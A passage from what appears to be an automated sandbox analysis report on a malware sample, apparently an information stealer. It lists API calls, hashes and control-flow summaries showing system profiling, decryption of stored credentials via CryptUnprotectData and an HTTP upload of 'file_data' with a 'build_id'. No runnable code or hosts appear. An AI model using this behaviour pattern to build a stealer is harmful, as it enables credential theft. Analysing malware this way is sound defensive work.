                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                • String ID: /
                                                                                • API String ID: 2868853201-4001269591
                                                                                • Opcode ID: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                • Instruction ID: 670fa807c41248f436aa2cd72aaefdfaece762a4e3a61ecb974f96717b874319
                                                                                • Opcode Fuzzy Hash: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                • Instruction Fuzzy Hash: D231EDB1901119EFDB10EFE5D885AEEBBB9EF48304F54407EE509B3681C7785A88CB64
                                                                                Function 004106C4 Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004106C9
                                                                                • CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                • _wtoi64.MSVCRT ref: 00410738
                                                                                • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                • String ID:
                                                                                • API String ID: 1816492551-0
                                                                                • Opcode ID: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                • Instruction ID: 38727b362cf05651e2ba0c167973076b7eb5e8e7f8c877263c03ca4ede2a4bf2
                                                                                • Opcode Fuzzy Hash: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                • Instruction Fuzzy Hash: A921A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                                Function 004111BE Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004111C3
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 186290926-0
                                                                                • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                Function 0040FC92 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                • wsprintfA.USER32 ref: 0040FCD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                • String ID:
                                                                                • API String ID: 362916592-0
                                                                                • Opcode ID: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                • Instruction ID: c4178db3a7b5cadc3d34117ce99b3585a5539fb9734740f51f0b0a417066b3ea
                                                                                • Opcode Fuzzy Hash: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                • Instruction Fuzzy Hash: 00E09275700234BBEB1067A8AC0EF87366EAB06725F111262FA15D21D0E6B499048AE5
                                                                                Function 004062A5 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                • String ID:
                                                                                • API String ID: 2068576380-0
                                                                                • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                                • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                                Function 0040FBCB Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                • String ID:
                                                                                • API String ID: 1206570057-0
                                                                                • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                                • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                                Function 0040FE81 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2452939696-0
                                                                                • Opcode ID: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
                                                                                • Instruction ID: cc392225a4cdd4d81fb3b645c3f3a3bcf8ea132c99b34c9dcf4625544169bb0c
                                                                                • Opcode Fuzzy Hash: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
                                                                                • Instruction Fuzzy Hash: D8D05B75D0011DD7CF10EB90FC49A8977BCAB04308F4001A1D700F2050E375D61D8BD5
                                                                                Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764stringnetworkmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 29 4043ad-4044ac _EH_prolog call 40f95a call 403a54 call 410dac call 40fb4d lstrlenA call 40fb4d call 410dac call 40f923 * 5 StrCmpCA 52 4044ae 29->52 53 4044af-4044b4 29->53 52->53 54 4044d4-4045f4 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 3 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 53->54 55 4044b6-4044ce call 40fb4d InternetOpenA 53->55 60 404cf2-404d2f call 410a94 * 2 call 40fb14 * 4 call 40f95a 54->60 124 4045fa-40462d HttpOpenRequestA 54->124 55->54 55->60 89 404d34-404db7 call 40f98e * 9 60->89 126 404633-404635 124->126 127 404ce9-404cec InternetCloseHandle 124->127 128 404637-404647 InternetSetOptionA 126->128 129 40464d-404c3f call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA call 410a94 HttpQueryInfoA 126->129 127->60 128->129 334 404c41-404c4e call 40f923 129->334 335 404c53-404c65 call 410a77 129->335 334->89 340 404db8-404dc5 call 40f923 335->340 341 404c6b-404c70 335->341 340->89 343 404cac-404cc1 InternetReadFile 341->343 344 404c72-404c77 343->344 345 404cc3-404cd9 call 40fb4d StrCmpCA 343->345 344->345 348 404c79-404ca7 call 40fa9c call 40f9e1 call 40f98e 344->348 351 404ce2-404ce3 InternetCloseHandle 345->351 352 404cdb-404cdc ExitProcess 345->352 348->343 351->127
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004043B2
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                  • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                  • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                  • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B42
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                • memcpy.MSVCRT ref: 00404B92
                                                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                • memcpy.MSVCRT ref: 00404BB3
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                • memcpy.MSVCRT ref: 00404BEA
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                • API String ID: 2658035217-3274521816
                                                                                • Opcode ID: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
                                                                                • Instruction ID: 7da96a8239c4269f2075af8d64b6677d5cc6d7227197695578cb8bd043abdbf5
                                                                                • Opcode Fuzzy Hash: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
                                                                                • Instruction Fuzzy Hash: 2E624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417AE505735C2DB786B4CCB65
                                                                                Function 0040BBE8 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 357 40bbe8-40bca7 _EH_prolog call 40f923 call 410d21 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40f95a call 40618b 380 40c0c4-40c0e8 call 40f98e call 401061 357->380 381 40bcad-40bcbc call 410d6d 357->381 381->380 387 40bcc2-40bd2f strtok_s call 40f923 * 4 GetProcessHeap HeapAlloc 381->387 397 40c00e-40c010 387->397 398 40bd34-40bd42 StrStrA 397->398 399 40c016-40c0bf lstrlenA call 40f923 call 4010b1 call 414437 call 40f98e memset call 40fb14 * 4 call 40f98e * 4 397->399 400 40bd44-40bd72 lstrlenA call 411154 call 40f9e1 call 40f98e 398->400 401 40bd77-40bd85 StrStrA 398->401 399->380 400->401 404 40bdc0-40bdce StrStrA 401->404 405 40bd87-40bdbb lstrlenA call 411154 call 40f9e1 call 40f98e 401->405 408 40bdd0-40be04 lstrlenA call 411154 call 40f9e1 call 40f98e 404->408 409 40be09-40be17 StrStrA 404->409 405->404 408->409 416 40bea2-40beb6 call 40fb4d lstrlenA 409->416 417 40be1d-40be6b lstrlenA call 411154 call 40f9e1 call 40f98e call 40fb4d call 406242 409->417 430 40bffb-40c00c strtok_s 416->430 431 40bebc-40becd call 40fb4d lstrlenA 416->431 417->416 458 40be6d-40be9d call 40f997 call 40fa9c call 40f9e1 call 40f98e 417->458 430->397 431->430 444 40bed3-40bee4 call 40fb4d lstrlenA 431->444 444->430 453 40beea-40befb call 40fb4d lstrlenA 444->453 453->430 462 40bf01-40bff6 lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40f997 * 4 453->462 458->416 462->430
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040BBED
